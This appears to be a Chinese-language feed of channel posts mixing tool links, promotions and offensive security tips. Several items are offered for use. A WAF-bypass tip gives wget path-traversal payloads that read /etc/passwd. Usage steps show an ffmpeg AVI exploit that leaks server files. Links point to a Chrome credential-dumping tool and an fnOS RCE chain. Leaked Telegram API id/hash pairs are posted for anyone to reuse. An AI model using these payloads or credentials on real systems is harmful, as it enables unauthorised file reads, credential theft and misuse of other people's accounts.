Cloudflare 错误页面生成器，能够创建模仿 Cloudflare 错误页面的自定义错误页面，并且可以将其嵌入到自己的网站中。
https://github.com/donlon/cloudflare-error-page

waf 穿透提示:
wget https://替换/....//....//....//....//....//....//....///....//....//....//....//....//....//....//etc/passwd -k


如果你知道存在的文件夹（例如通过查看网页源代码找到的资源路径），可以将其作为起点：
如果图片路径是 /static/img/logo.png，Payload 可能是：
https://替换/static/img//....//....//....//....//....//....//....//....//....//....//....//etc/passwd

很多简易的防火墙（WAF）或代码会检查输入中是否包含 ../。如果攻击者写成 ....//，一些写得不好的过滤器可能会检测 ../ ，没发现（因为中间多了点）。waf 执行清理逻辑：把所有的 // 替换成 /，目的是为了规范化 URL，waf 执行递归清理，也就是把 .. 删掉，结果剩下的部分又组合成了新的 ../

或者是路径规范化漏洞，有些后端程序在接收到 ....// 时，会先进行一次非标准的字符串处理，将其误判为两个连续的跳转请求，或者将其修剪成了操作系统最终能识别的 ../

https://github.com/LandGrey/SpringBootVulExploit
SpringBoot攻防全解

https://github.com/Maldev-Academy/DumpChromeSecrets
从现代 Chrome 版本中提取数据，包括刷新令牌、cookie、保存的凭据、自动填充数据、浏览历史记录和书签。

这个可以跟楼上配对

* Security: api\_id/api\_hash are hard-coded (api_id = 20227969, api_hash = 3fc5e726fcc1160a81704958b2243109); mitigate with rate limits/rotation if abused.


API_ID=25496841
API_HASH=d7ed3ebb8f4323c37c5ffcac40e677d4
BOT_TOKEN=


TG_API_ID="20559113" \
TG_API_HASH="ed8e97b3a73a324f5cf0b6dae63239b2"

供开发者们使用的 Telegram api id 和 hash，不能申请 api 的用户可以尝试下

@TheLegendofLUOXIAOHEI
这个频道也是你频道猪的，想看的可以点个关注
因为频道猪销号了所以丢失了所有权，不会再有更新

#security
大开眼界，还有这些玩法的？
https://zhuanlan.zhihu.com/p/1926774979476825233

利用方法
https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py

./gen_xbin_avi.py file://<filename> file_read.avi
Upload file_read.avi to some website that processes videofiles
(on server side, done by the videoservice) ffmpeg -i file_read.avi output.mp4
Click "Play" in the videoservice.
If you are lucky, you'll the content of <filename> from the server.
这个脚本有点老如果要用可能还需要放一个 ffmpeg2.x 的受影响 elf

https://github.com/666ghj/MiroFish
MiroFish 是一款基于多智能体技术的新一代 AI 预测引擎。通过提取现实世界的种子信息（如突发新闻、政策草案、金融信号），自动构建出高保真的平行数字世界。在此空间内，成千上万个具备独立人格、长期记忆与行为逻辑的智能体进行自由交互与社会演化。你可透过「上帝视角」动态注入变量，精准推演未来走向
你只需：上传种子材料（数据分析报告或者有趣的小说故事），并用自然语言描述预测需求
MiroFish 将返回：一份详尽的预测报告，以及一个可深度交互的高保真数字世界

#Typora 主题 很好看

https://theme.typora.io/theme/Phycat-Color/

全局CLAUDE.md分享，结合风佬CCG

via LINUX DO - 热门话题 (author: YuCheng)

https://github.com/skylot/jadx
jadx - Dex to Java decompiler
体验了一把，很实用，还有 gui

看看你们的 IRC 注册时间👀
/msg NickServ info 你的 nickname ALL

NickServ: Registered : Apr 10 13:12:20 2022 +0000 (3y 40w 4d ago)
[09:23] NickServ: Last addr : ~OutlinedA@user/OutlinedArc217
[09:23] NickServ: vHost : user/OutlinedArc217 (assigned on Jul 22 02:09:37 2022 +0000 (3y 25w 6d ago))

https://github.com/chatfire-AI/huobao-drama
🎬 火宝短剧 - 基于 AI 的一站式短剧生成平台 《一句话生成完整短剧，从剧本到成片全自动化》

https://github.com/Jagalite/superseedr

Superseedr 是终端下的 BitTorrent
功能特性
🎨 动画化、高性能 TUI（1–60 FPS）
🧲 操作系统级磁力链接支持
📊 实时网络图表与群集（swarm）分析
🔐 官方 Docker + VPN 配置，支持自动端口转发
🔄 无需重启客户端即可动态重载入站端口
✅ 通过基于模型的测试，实现无与伦比的可靠性与正确性
🛡️ 面向私有 Tracker 的构建版本（不使用 PEX 和 DHT）
⚡ 基于 Rust 的引擎，兼顾性能与安全
💾 持久化状态与崩溃恢复
🧵 对等节点级指标与可用性热力图

linux telnetd rce

是的，linux telnetd rce

https://mp.weixin.qq.com/s/l1PQ1YDcUezaMVT1-unQ7Q

在安装必应壁纸后，连续使用 7 天必应搜索免费领取价值 25 元的 B 站大会员月卡
①先加入 Reward https://rewards.bing.com/welcome?rh=46925AC2&ref=rafsrchae&form=ML2XE3&OCID=ML2XE3&PUBL=RewardsDO&CREA=ML2XE3

②打开活动地址
https://aka.ms/bilrwtrend
打不开就用这个https://rewards.bing.com/?form=BILRW2

PoC：飞牛 OS（fnOS）RCE 链：认证绕过

无需 longtoken，拿到 rsa_private_key.pem 就可以任意伪造签名

https://github.com/bron1e/fnos-rce-chain

转发不带来源是有原因的